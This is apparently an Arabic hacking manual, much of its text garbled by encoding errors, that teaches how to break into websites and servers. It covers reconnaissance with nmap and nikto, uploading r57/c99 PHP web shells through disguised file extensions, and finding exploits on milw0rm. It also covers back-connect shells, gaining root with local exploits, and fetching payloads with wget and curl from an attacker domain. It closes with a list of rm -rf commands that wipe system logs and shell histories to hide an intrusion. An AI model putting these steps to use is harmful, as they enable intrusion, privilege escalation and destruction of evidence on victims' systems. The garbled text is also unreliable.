Professional Documents
Culture Documents
1431 \6 \9هـ
اٌٍالَ ػٍ١ىُ ٚنؼّح اهلل ٚتهواذح
اٌؽّك هلل نب اٌؼاٌّٚ ٓ١اٌظالج ٚاٌٍالَ ػٍ ٝأشهف األٔث١اء ٚاٌّهٌٍٓ١
ٔثٕ١ا ِؽّك ٚػٍ ٝآٌٗ ٚطؽثٗ ٌٍ ِٓٚه ٌث ٍٗ١إٌ َٛ٠ ٝاٌك.ٓ٠
اٌٍ ُٙالػٍُ ٌٕا إال تّا ػٍّرٕا أه أٔد ػالَ اٌغٛ١ب
ذؽ١ح ؿ١ثح ٚ ,,,تؼك
فٍمك لّد تؼًّ اٌىراب ٚاٌؽّك هلل األِٛن ٍِ١هٖ ٚوً ٘ما ترٛف١ك ِٓ اهلل
ٚاٌؽّك هلل ػٍ ٝوً شٟء تكا٠راً أذّٕا ػكَ اٌرفكاَ أِ ٞؼٍِٛح ٚنقخ فٟ
٘ما اٌىراب ف ٟأل٠ح اٌٍٍّّ٘ ٓ١كف ِٓ ٟػًّ ٘ما اٌىراب اٌفائكج ٌىً
أـٛأ ٟاٌٍٍّّ٠ ٓ١رى٘ ْٛما اٌىراب ِٓ أنتغ فظٛي ٚوً فظً ٠فرٍف
ػٓ األـه ٠ٚرّ١ى وً فظً ػٓ األـه تـهلٗ ٚأٌاٌ١ثٗ اٌفظً األٚي اٌؽً١
اٌٍّرفكِح ِٚؼٍِٛاخ ؼٛي و١ف١ح االـرهاق اٌفظً اٌصأ ٟأٌاٌ١ة اـرهاق
اٌّٛالغ ٚو١ف١ح اٌؽظٛي ػٍ ٝشغهاخ اٌّٛلغ اٌفظً اٌصاٌس أُ٘ األٚاِه
اٌٍّرفكِح ف ٟاـرهاق اٌّٛالغ ٚأُ٘ اٌرفاط ً١ؼٛي ذفـ ٟاٌٍ١ف ِٛق
اٌفظً اٌهاتغ اٌٍ١ـهج ػٍ ٝاٌٍ١هفه ٚأُ٘ األقٚاخ اٌٍّرفكِح ٚاٌؽظٛي
ػٍ ,root ٝقػٔٛا ٔم َٛتعٌٛح ػٓ اٌٙىه ٚؿهق ٚأٌاٌ١ة اٌّفرهق فٟ
ػٍّ١ح اٌمهطٕح,التك اٚالً اْ ذرؼٍُ أٌاٌ١ة اٌّفرهق ف ٟاـرهاق ٘كف
ِؼ ٓ١ػٌٍ ٝث ً١اٌّصاي أنقٔا اْ ٔفرهق ِٛلغ ِؼ ٓ١التك ِٓ ظّغ
ِؼٍِٛاخ اٚالً ػٓ اٌٙكف ٠ٚأذ ٟقٚن اٌّفرهق تعّغ اٌّؼٍِٛاخ ػٓ
اٌٙكف ِصً ٚظٛق شغهج ف ٟاٌّٛلغ ِٚا إٌ ٝلاٌه شُ ٠م َٛتاٌٙع َٛتٙمٖ
اٌّؼٍِٛاخ ػٍ ٝاٌّٛلغ ٘ٚىما ٚاذّٕا ٌىُ اٌّرؼح ٚاٌفائـكج
حمتويات الكتاب
اٌفظً األٚي
خّع اٌّعٍِٛاث
اٌظ١زفز server
أٔٛاع اٌظ١زفزاث types server
اٌشً shell
شزذ شً r57.php
ِزاوش اٌخسّUpload ً١
اٌخساtrickery ً٠
اٌخساtrickery2 ً٠
اٌظىزبج script
اٌثغـزة Vulnerabilities
ٌغاث اٌبزِدت
األخطاء اٌبزِد١ت
:.جّع اٌّعٍِٛاث .:
تكا٠راً ذٛظك ِٛالغ ذم َٛتؼهع اٌّؼٍِٛاخ ػٓ اٌٙكف
ِصً إ ً١ّ٠طاؼة اٌّٛلغ ٛٔٚع اٌٍّمُ ٚإٌظاَ اٌٍّرفكَ
http://www.netcraft.net/
http://www.whois.com/
ؿ١ة أ ْ٢م َٛتـه٠مح أـه ٜتعّغ اٌّؼٍِٛاخ ػثه أقاج Nmap
ٚظ١ف ٘مٖ األقاج ذم َٛتٍّػ اٌّٛلغ ٚاٌرفهاض إٌّافم
ج
اٌّفرٛغج ٚظّ١غ اٌّؼٍِٛاخ اٌر ٟلوهٔا ٌاتمًا ِصً ٔٛع اٌٍّمُ
أ ً١ّ٠طاؼة اٌّٛلغ إٌّافم اٌّفرٛؼح ٛٔٚع إٌظاَ ظّ١ؼٙا ُِٙ
ظكاً ف ٟػٍّ١ح االـرهاق إْ شاءاهلل
ؿه٠مح أ٠ؼًا أـه ٜتعّغ اٌّؼٍِٛاخ ػثه أقاج nikto
ٚظ١فح ٘مٖ االقاج ذم َٛتٕفً أقاج nmapالوٓ ذفرٍف فٟ
اٌرفكاِٙا أ ٞأٙا ذؽراض ٌٍّرهظُ ٌغح perlاٌث١هي ٚذٕظ١ثٗ
ػٍ ٝظٙاون ٚالذم َٛتٍّػ اٌثٛنذاخ ف ٟاٌّٛلغ اٌّؼٓ١
ٌٛٚف أل َٛتشهغ ٘مٖ األقٚاخ ف ٟاٌفظً اٌصأ ٟطثهًا ظًّ١
ٚاهلل ٌٟٚاٌرٛف١ك
:.اٌغ١شفش .:
٘ ٛظٙاو اٌٍّرؼ١ف ٌٍّٛلغ ٚذىٍِ ْٛفاخ اٌّٛلغ ذٛظك ف ٛ٘ٚ ٗ١ظٙاو
وّثٛ١ذه ػاق ٞالوٓ تّٛاطفاخ غ١ه اٌعٙاو اٌؼاق ٞوّصً اٌم ٞذٍرفكِٗ
ِٛٚاطفاذٗ وىثه ؼعُ اٌمهص فٌٚ ٗ١هػرٗ ٘ائٍٗ
c99.php
r57.php
phpshell.php
sniper-sa.php
perl
وّا لوهٔا ٌاتماً أّ٘١ح اٌشً ٚٚظ١فرٗ ٚلٍٕا ذفرٍف أٔٛاػٙا الوٓ اٌٙكف
ٚاؼك ٛ٘ٚا ذـث١ك أٚاِه اٌّفرهق ٌٛف ٔم َٛترفظ ً١اٌشً ٔٛع
r57.php
.: r57.php ً شهغ ش:.
safe_mode: ON
safe_mode: OFF
OFF ٚ أON ْٛى٠ ْق اِا اِٛ ٕ٘ا اٌٍف
/home/fawazhack/public_html
هف١ٌٍا
ن ٍِٝىأه ػ
Linux 2.4.20-42.9.legacy
َع إٌظاٛٔ
back-connect
الذظاي ػىٍ ٟتٍ١هفه ِصً إٌد واخ
ػٕكِا ٔه٠ك أـرهاق اٌّٛلغ التك ِٓ ٚظٛق ؿه٠مح ذّىٕٕا تٛػغ أ ٚنفغ
اٌشً ف ٟاٌّٛلغ ٚاٌٍ١هفه
ِٕٙٚا ِاٍٟ٠
أِا اْ ذى ْٛػثه شغهج ٠ٚرُ أٌرغالٌٙا ٔٚف ِٓ ُٙوٍّح اٌرغالي اْ ٔمَٛ
تهفغ اٌشً shellإٌ ٝاٌّٛلغ اٌٍّرٙكف
أِ ٚهوى ذؽّٔ ً١م َٛتاٌرؽا ً٠ػٍٚ ٗ١نفغ ٍِف اٌشً تـهق ِفرٍفح
ٌٚألوه تؼغ ِٕٙا تؼك لًٍ١
االِركاقاخ اٌٍّّٛؼٗ
ٌ١ى٘ ْٛىما
C99.php.zip
C99.php.rar
C99.php.jpg
C99.php.gif
ٟاٌٍّرعكاخ فٚ ػغ أـه اٌصغهاخٛاً ذ١ػٛ اٌثَٚ اٛ٠ ًالغ وٌّٛ٘مٖ اٚ
لاٌهٌِٝا إٚ اخ اٌّظاتٗ تفـاء١اٌثهِع
:.أٛاع اٌصغهاخ .:
عأروش بعط ٚأشٙش اٌثغشاث اٌّٛجٛدة حاٌ١اً
Jommla
File Include
XSS
Sql Injection
Buffer over flow
Joomla
ظِٛال ٛ٘ٚا ٌىهتد ٚالوٓ ٔظهاً ٌٛظٛق شغهاخ وص١هٖ ف٘ ٟما اٌٍىهتد
اقنظٕاٖ ػّٓ اٌصغهاخ ٠ٚرٛاظك ٘ما اٌٍىهتد تشىً وث١ه ف ٟاٌّٛالغ
االظٕثٚ ٗ١ػٕك اٌكـٛي ٌٍّٛلغ ٠ؽًّ اٌٍىهتد اٌراٌٌٛ ٟف ذم َٛتئـرهالٗ
تئلْ اهلل وّا لٍٕا أٗ ٛ٠ظك شغهاج تٙما اٌٍىهتد
File Include
٘ٚما إٌٛع ِٓ اٌصغهاخ ٠م َٛتهفغ ا ٚإقناض ِعٍك ِٓ ـانض اٌّٛلغ ػثه
اٌهتؾ تّعٍك ـانظٕ٘ٚ ٟا ٠أذ ٟقٚن اٌّفرهق تهتؾ ٍِف اٌرعًٍ shell
xss
أِا ٘ما إٌٛع ِٓ اٌصغهاخ ِٓ ـالٌٙا ٔمكن ٍٔؽة و٠ٛىى ِصً األقِ ٓ١أٚ
ػؼِ ٛؼ ٓ١تاٌّٛلغ
Sql Injection
٘ما إٌٛع ِٓ اٌصغهاخ ٠م َٛػثه أــاء تهِع١ح تئنٌاي أٚاِه إٌ ٝلاػكج
اٌث١أاخ ِصً أِه ٌمهاءج ِؼٍِٛاخ ػؼ٠ٛح األقِٓ نلُ ٚاؼك أ ٚأِه ٌرغ١١ه
وٍّح اٌّهٚن ّ٠ٚىٓ تٙمٖ اٌصغهج ؼمٓ اٌّٛلغ تاٌشً
Buffer over Flow
٘ما إٌٛع ِٓ اٌصغهاخ ذم َٛتٙع َٛػٍ ٝاٌٍ١هفه ٘ ٍّٝ٠ٚع" َٛاٌـفػ"
٠م َٛاٌّفرهق تاٌٙع َٛػٍٔ ٝمـٗ ِؼ ٕٗ١ف ٟاٌٍ١هفه ِصً اٌٙع َٛػٍٝ
تٛنخ االف ذ ٟتٚ ftp ٟاٌٙكف ِٓ لاٌه إػؼاف اذظاي اٌٍ١هفه ٚفظً
اذظاٌٗ تٙما اٌثٛنخ أ ٚأ ٞتٛنخ ٠م َٛتئٌرغالٌٗ اٌّفرهق ِٓ اٌثٛنذاخ
اٌّفرٛؼح.
ٔىخف ٟبٙزا اٌمذس ِٓ اٌثغشاث ٘ٚزا إٌٛع ِٓ اٌثغشاث اٌّشٛٙسة
ٚاٌّخٛاجذة حاٌ١اً بىثشة ٚال ٕٔغ ٝأْ اٌثغشاث وث١شة جذاً
ٌ :.غاخ اٌثهِعح .:
ٌٚألوه اُ٘ ٚاشٙه ٘مٖ اٌٍغاخ تهِعٗ ٠ظكن ِٓ ِثهِط ٘مٖ اٌٍغٗ ــاء فاقغ ٕ٠ٚرط شغهج
٠رُ اٌرغالٌٙا ػٓ ؿه٠ك اٌّفرـهق
ٌغت c
ٌغت perl
ٌغت html
ٌغت python
ٌغت Ruby
aqaedcom
اِا اٌّعٍك اٌراٌٛ٘ٚ ٟا ٛ٠ون اٌّٛلغ ٚتئِىإٔا اٌرفّ ٓ١إٌ ٝاْ ٔظً إٌٌٛ ٝؼح
اٌرؽىُ ٌ ٟتًٕ
public_html
اِا اٌّعٍك اٌراٌٛ٘ٚ ٟا ٠ؽر ٜٛػٍ ٝظّ١غ ٍِفاخ اٌّٛلغ ِٓ ٌىهتراخ ِٚا إٌٝ
لاٌه
اٌفصً اٌثأٟ
##################Errors##################
# error #
# public_html #
# mysql #
# warning #
##################Errors##################
أ ٚاٌثؽس ػٓ ِهاوى ذؽّٔٚ ً١م َٛتاٌرؽا ً٠ػٍٙ١ا وّا لوهٔا ٌاتماً ؿه٠مح
اٌرؽاً٠
Upload
أٔ ٚم َٛتىراتح تاٌؼهت١ح
ِهوى ذؽًّ١
.: البحث عن ثغراث السكربتاث:.
َ تاٌثؽس ػٓ شغهاخ ِٕاٌثٗ ٌٍىهتراخٛف ٔمٌٛ مح٠ ٘مٖ اٌـهٟف
ًنج ِصِٛٙش
Wordpress IP.Board
Phpld phpbb
Joomla Infinity
php-fusion vBulletin
ibd smf
WHMCS XMB
smart Burning Board4
Almnzm Arab Portal
Discuz! 6.0 W eb2.0
Flash Chat IP.Board
coppermine 4images
هفه١ٌٍ اip ا تؼكٙػؼٚٚ bing لغِٛ ٟتؼك اٌثؽس ػٓ ٘مٖ اٌٍىهتراخ ف
الغٌّٛلك لوهٔا ِصً ٘مٖ اٚ الغ اٌصغهاخِٛ ٜ إؼكٌَٝ تاٌم٘اب إٛٔم
http://www.milw0rm.com
شُ ٔم َٛتاٌرٛظٗ إٌ ٝـأح اٌثؽس
http://www.milw0rm.com/search.php
ٔٚؼغ أٌُ اٌٍىهتد اٌمٚ ٞظكٔاٖ ف ٟاٌٍ١هفه ٔٚم َٛتإٌظه إٌ ٝشغهاذٗ
ٚذـث١مٙا ؼر ٝاٌٛطٛي إٌٔ ٝر١عح
:.إظهار كافت الوعلىهاث والثغراث بالوىقع .:
بستخذام أداة nikto
ٚظ١فح ٘مٖ األقاٖ :تا ِٓ ٓ٠اٌؼٕٛاْ إظٙان ِؼٍِٛاخ اٌّٛلغ ٚاٌصغهاخ
ٛ٘ٚا ِثهِط تٍغح اٌث١هي فٍماٌه ٔؽراض ِرهض ٌغح اٌث١هي perl
ٔم َٛترؽّ ً١األقاٖ ِٓ ٕ٘ا
/http://cirt.net/nikto/UPDATES
ِغ اٌؼٍُ اْ ٘ما اٌّٛلغ ٙ٠رُ تاألقاٖ ٠ٚم َٛوً ِكٖ ِؼ ٕٗ١ترؽك٠س ٚإػافح
شغهاخ ظك٠كج ٌألقاٖ لُ ترؽّ ً١أـه إطكان ٌٙمٖ األقاٖ ِٓ اٌّٛلغ اٌراٌٟ
تؼك ذؽّ ً١األقاٖ ٔم َٛتٛػؼٙا فِ ٟعٍك ٌغح اٌث١هي ِصً األِركاق اٌراٌٟ
C:/perl/bin/nikto
ؿه٠مح ذشغ ً١االقاٖ
ٔم َٛتاٌم٘اب إٌِٛ ٝظح اٌكٚي شُ ٔؼغ األِه اٌراٌٟ
\Cd
شُ األِه االـه
Cd perl/bin
شُ
Cd perl/bin/nikto
شُ ؿه٠مح اٌرشغ ً١أٚالً ٔم َٛتٛػغ االِه
Perl nikto.pl
٘ما األِه ٚػ١فرٗ ٠م َٛتاظٙان ـ١اناخ األقاٖ
ٚالوٓ ِإّٙ٠ا ِٓ ت٘ ٓ١مٖ األٚاِه أِه
-host
األْ ٔم َٛتٛػغ األِه واِالً
Perl nikto.pl –host www.fawazhack.com
تؼك ٚػغ األِه اٌراٌٌٛ ٟف ذه ٜأٗ لاَ تاظٙان ٔٛع ٔظاَ اٌرشغ ً١أ٠ؼاً
اطكانٖ ِٚؼٍِٛاخ ؼٛي اٌك ٞاْ اي ِٚ dnsؼٍِٛاخ اـهِّٗٙ ٜ
ٚإظٙان اٌصغهاخ تاٌّٛلغ
:.هسح الوىاقع بستخذام برناهح .:
Shadow Security Scanner
أٚالً ٚظ١فح ٘ما اٌثهٔاِط ٠م َٛتٍّػ اٌّٛلغ ٚإظٙان اٌصغهاخ ٚاألِاوٓ
اٌؽٍاٌح ف ٟاٌّٛلغ أٔ ٚماؽ اٌؼؼف تؼك ذصث١د اٌثهٔاِط
Xp Linux
أِا األٚاِه اٌٍّرفكَ ف ٟاٌشً ػٍ ٝؼٍة اٌٍ١هفه إِا إٌٍ١ىً أ ٚأوً
ت ٟاٌؼاقج ٠ى ْٛاٌٍ١هفه ٔظاَ ٌ١ٕ١ىً ٌٚماٌه ٌٛف أل َٛتشهغ أٚاِه
إٌٍ١ىً
أواهر اللينكس تقسن إلى ثالثت أقسام هنها
tar -zcf zz.tar daily tar -zcf tar أِز اٌضغط باِخذاد
tar -czvf file name.tar.gz file name.sql tar -czvf gz أِز ضغط اٌٍّف باِخذا
tar -czvf file name.tar.gz file name.sql tar -czvf أاث١ت ضغط لاعذة اٌب١ف١و
Wget أِزاٌظسب
*wget http://www.fawazhack.com/ll.zip;ls ll
*curl -o ./ll.zip http://www.fawazhack.com/ll.zip;ls ll curl -o ./ اِز اٌظسب ا٢خز
اٌثان قٚن تاٌؼهت١ح ٠مظك تٙا تاب ـٍفٔٚ ٟفِٕٙ ُٙا تئِىإٔا ػًّ تاب
ـٍف ٟتاٌٍ١هفه
اٌثان قٚن ِثهِط تٍغح اٌث١هي ٚ perlظ١فرٗ فرػ ِٕفم تاٌٍ١هفه ٚاإلذظاي
تٗ
ػٕك اٌكـٛي ٌٍّٛلغ ذٛظك ػكخ ـ١اناخ ٔم َٛتاٌم٘اب إٌ ٝاٌثؽس
تؼك اٌكـٛي ػٍ ٝـأح اٌثؽس ٔم َٛا ْ٢تإٌظه إٌ ٝاٌشً ٔٚهٛٔ ٜع إٌظاَ
ٚذؽك٠صٗ وّا ف ٟاٌظٛنج اٌراٌ١ح
http://www.milw0rm.com/local.php
http://www.kernel.org/pub/linux
http://www.securityfocus.com
ا ْ٢لُ تاٌم٘اب إٌ ٝاٌشً ٚال٘ة إٌ ٝاألٌفـً ٌٛف ذعك
back-connect
ف٘ ٟمٖ اٌفأاخ اٌصالز ٠ـٍة
٠ Ipمظك تٙا إ ٞت ٟظٙاون
Portإٌّفم اٌم ٞلّد تاٌرٕظد تـٗ
Useقػٙا ػٍِ ٝا٘١ا
شُ لُ تاٌؼغؾ ػٍconnect ٝ
ٚل٘ة إٌ ٝإٌد واخ ٌٛٚف ذعك أٗ ذُ االذظاي تاٌٍ١هفه
:.اٌحصٛي عٍ ٝاٌٍٛواي سٚث .:
أٚالً التك ِٓ االذظاي تإٌد واخ
ٔم َٛتهفغ اٌٍٛواي إٌ ٝاٌٍ١هفه التك ِٓ نفؼٗ إٌِ ٝعٍك ٠ؽًّ اٌرظان٠ػ
اٌىاٍِٗ 777
أْ واْ اٌٍٛواي غ١ه ِرهظُ ٔم َٛتئػـائٗ أ٠ؼاً اٌرظان٠ػ اٌىاٍِح 777
تاألِه اٌراٌٟ
اٌّىاْ اٌٍ ٟنافؼ ٓ١ػٍ ٗ١طفؽح االـرهاق <path too u're index
ؼر٠ ٝثم tmp ٝاالْ ٍٔؽة طفؽح االـرهاق ػٍ ٝاٌٍ١هفه ػٍِ ٝعٍك
أِه اٌرشغً١
http://whois.webhosting.info
لُ تاٌكـٛي إٌ ٝاٌّٛلغ ٚٚػغ إ ٞت ٟاٌٍ١هفه شُ ِٛافك ٚتؼك٘ا إػغؾ
ػٍٔ ٝفً إ ٞت ٟاٌٍ١هفه ف ٟاٌّٛلغ ٚذظٙه إٌرائط
.: شفش١ ِغح أثاسن ِٓ اٌغ:.
هفه١ٌٍ اٍٝفً التك ٍِػ أشانن ػ٠تؼك ػًّ اٌّاي ق
ٟ تٞٓ اإل٠َ ترفىٛم٠ هفه١ٌٍاٌفائكج ِٓ لاٌه اٚ قٌٍَٛ تٍّػ ٍِفاخ اٛٔم
هفه١ٌٍ اٟاشانن فٚ
ظك ٌه أشه تؼك٘ا إْ شاءاهللٛ٠الٚ قٌٍٛاِه ٍِػ ٍِفاخ اٚا أ١٘ ٞ٘مٚ
اٍٙا وٙم١التك ِٓ ذـث
rm -rf /tmp/logs
rm -rf $HISTFILE
rm -rf /root/.ksh_history
rm -rf /root/.bash_history
rm -rf /root/.ksh_history
rm -rf /root/.bash_logout
rm -rf /usr/local/apache/logs
rm -rf /usr/local/apache/log
rm -rf /var/apache/logs
rm -rf /var/apache/log
rm -rf /var/run/utmp
rm -rf /var/logs
rm -rf /var/log
rm -rf /var/adm
rm -rf /etc/wtmp
rm -rf /etc/utmp
find / -name *.bash_history -exec rm -rf {}
\;
find / -name *.bash_logout -exec rm -rf {} \;
find / -name "log*" -exec rm -rf {} \;
find / -name *.log -exec rm -rf {} \;
اٌخاحّت